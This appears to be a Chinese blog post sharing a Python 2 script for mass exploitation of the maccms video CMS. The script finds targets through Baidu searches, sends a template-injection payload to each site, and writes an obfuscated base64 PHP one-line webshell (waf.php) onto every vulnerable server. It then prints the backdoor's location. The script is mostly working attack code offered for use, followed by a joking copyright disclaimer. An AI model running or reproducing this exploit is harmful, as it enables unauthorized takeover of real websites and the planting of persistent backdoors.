当前位置:首页 > seo引流

【SEO工具】maccms全自动getshell py脚本

不详2018-11-181677人围观

话不多说,直接上代码

# coding=utf-8

import requests

import urllib

from bs4 import BeautifulSoup

headers = {

    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"

}

def xxe():

    exp = '&wd={{page:lang}if-:fputs(fopen(base64_decode(d2FmLnBocA),w),base64_decode(PD9waHAgJGFycj0iantmcS0pZFVUWFlgfWIuQCI7IGZvcigkaT0wOyRpPCBzdHJsZW4oJGFycik7JGkrKyl7JGFyclskaV09Y2hyKG9yZCgkYXJyWyRpXSktNSk7fWV2YWwoJGFycik7Pz4))}22{endif-}&submit='

    keyurl = 'http://www.baidu.com/s?wd=inurl:index.php?m=vod-search' + '&pn='

    x = 0

    while True:

        url = keyurl + str(x * 10)

        x+=1

        xxx = requests.get(url=url,headers=headers).text

        req = BeautifulSoup(xxx,'html.parser')

        html = req.select('div.c-container > h3 > a')

        #sqls = requests.get(a['href']).status_code

        #sql = requests.get(a['href']).url

        # xxe()

        sql = html[0].attrs['href']

        sqlss = requests.get(sql).url

        shell = urllib.urlopen(url=sqlss,data=exp).read()

        if '您的提交带有不合法参数' in shell:

            print '没有漏洞'

        else:

            print shell + '\n\t此网站存在漏洞,一句话地址waf.php'



xxe()

 

    版权声明:

    博主在此发文(包括但不限于汉字、拼音、拉丁字母)均为随意敲击键盘所出,用于检验本人电脑键盘录入、屏幕显示的机械、光电性能,并不代表本人局部或全部同意、支持或者反对观点

    如需要详查请直接与键盘生产厂商法人代表联系。挖井挑水无水表,不会网购无快递。

    文章内容除非注明原创,否则来源于互联网,不代表本人的任何立场;涉及到的软件来源于互联网,仅供个人下载使用,请勿用于商业用途,版权归软件开发者所有,下载后请于24小时内删除,请支持正版!

    因下载本站任何资源造成的损失,全部责任由使用者本人承担!

    如果你是版权方,认为本文内容对您的权益有所侵犯,请联系博主,待博主进行严格地审查和背景调查后,情况属实的将在三天内将本文删除或修正。

    博主的文章没有高度、深度和广度,只是凑字数。由于博主的水平不高(其实是个菜B),不足和错误之处在所难免,希望大家能够批评指出。